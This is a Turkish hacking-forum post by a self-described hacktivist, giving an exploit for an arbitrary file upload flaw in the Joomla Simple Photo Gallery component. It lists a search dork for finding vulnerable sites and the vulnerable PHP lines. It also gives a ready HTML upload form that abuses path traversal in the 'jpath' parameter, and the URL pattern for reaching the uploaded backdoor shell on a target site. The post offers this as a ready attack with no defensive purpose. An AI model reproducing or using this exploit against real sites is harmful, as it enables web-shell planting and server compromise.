Konuyu Oyla:
  • Toplam: 1 Oy - Ortalama: 5
  • 1
  • 2
  • 3
  • 4
  • 5
   
Konu: Joomla Simple Photo Gallery Dosya Yükleme Açığı
KingSkrupellos
*
avatar
Hacktivist
Durum: Çevrimdışı
Seviye Puanı: 55
Yaşam Puanı: 1,369 / 1,369
Deneyim: 78 / 100
Rep Sayısı: 2742
Mesaj Sayısı: 6282
Üyelik Tarihi: 21.08.2013
     
Yorum: #1
Joomla Simple Photo Gallery Dosya Yükleme Açığı
20.04.2015 21:25




Dork =>
Kod:
inurl:com_simplephotogallery

Açığın kaynaklandığı Yer =>
Kod:
20.   $fieldName = 'uploadfile';
87.      $fileTemp = $_FILES[$fieldName]['tmp_name'];
94.         $uploadPath = urldecode($_REQUEST["jpath"]).$fileName;
96.      if(! move_uploaded_file($fileTemp, $uploadPath))

Dizin Yolu =>
Kod:
/administrator/components/com_simplephotogallery/lib/uploadFile.php

Açıklı Dosyanın Yolu =>
Kod:
uploadFile.php

Exploit =>
Kod:
<form method="POST" action="http://localhost/administrator/components/com_simplephotogallery/lib/uploadFile.php" enctype="multipart/form-data" >
    <input type="file" name="uploadfile"><br>
    <input type="text" name="jpath" value="..%2F..%2F..%2F..%2F" ><br>
    <input type="submit" name="Submit" value="Pwn!">
</form>

# Şelinizin ismini Backdoor_DOSYA.php (eg : backdoor__HERHANGİ BİR İSİM - SERVER KENDİSİ BELİRLIYOR.php)


şeklinde oluyor..

Shell Ulaşım Yolu =>

Kod:
http://HEDEFSITE/backdoor__[HERHANGİ RAKAM VE HARF].php
Alinti



1 Ziyaretçi